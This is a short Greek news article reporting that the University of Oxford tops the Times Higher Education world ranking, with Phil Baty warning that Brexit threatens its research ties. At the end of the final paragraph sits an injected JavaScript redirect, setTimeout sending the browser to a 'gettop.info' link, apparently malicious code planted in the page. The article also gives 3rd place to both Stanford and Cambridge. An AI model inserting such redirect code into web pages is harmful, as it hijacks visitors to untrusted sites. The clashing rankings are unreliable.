Πρώτο στον κόσμο το Πανεπιστήμιο της Οξφόρδης

0
6

 

Το Πανεπιστήμιο της Οξφόρδης είναι το πρώτο ανώτατο εκπαιδευτικό ίδρυμα της Βρετανίας που καταλαμβάνει την πρώτη θέση στην κατάταξη Times Ηigher Εducation .

Η Οξφόρδη τέθηκε επικεφαλής της κατάταξης διότι βελτιώθηκε σε τέσσερις παράγοντες που θεωρούνται κρίσιμοι: διδασκαλία, έρευνα, βιβλιογραφικές παραπομπές και διεθνή επιρροή.

Ωστόσο, η επιλογή για την έξοδο της Βρετανίας από την Ευρωπαϊκή Ένωση είναι πιθανόν να απειλήσει το παλαιότερο πανεπιστήμιο στον αγγλόφωνο κόσμο, αποκλείοντας επιστήμονες από ερευνητικά προγράμματα, δηλώνει ο Φιλ Μπάτι, ο επικεφαλής της κατάταξης.

«Όπως αναφέρουν ορισμένοι κορυφαίοι πανεπιστημιακοί, έχει παγώσει η συμμετοχή τους σε ερευνητικά προγράμματα που γίνονται σε συνεργασία με συναδέλφους από την Ευρωπαϊκή Ένωση και πολλοί παραδέχονται ότι μπορεί να αναζητήσουν να μεταφερθούν σε πανεπιστήμια εκτός της χώρας», δήλωσε στο BBC Φιλ Μπάτι.

Αν και το Oxford University και το Imperial College του Λονδίνου, μαζί με το ETH Zurich περιλαμβάνονται στα 10 καλύτερα πανεπιστήμια του κόσμου, στην κατάταξη κυριαρχούν τα αμερικανικά ανώτατα εκπαιδευτικά ιδρύματα.

Το Stanford University βρίσκεται στην 3η θέση, το Princeton στην 7η και τα University of California, Berkeley και University of Chicago ισοβαθμούν στη 10η θέση.

Το Cambridge βρίσκεται στην 3η θέση, το Imperial College στην 8η και το ETH Zurich στην 9η.

Τα ασιατικά ανώτατα εκπαιδευτικά ιδρύματα έχουν καταγράψει πρόοδο και δύο νέα ασιατικά πανεπιστήμια βρίσκονται πλέον στα 100 και άλλα τέσσερα στα 200 καλύτερα του κόσμου. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here